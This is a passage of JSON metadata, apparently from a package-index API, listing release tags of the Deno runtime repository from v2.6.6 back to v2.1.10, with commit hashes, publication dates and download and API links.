bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/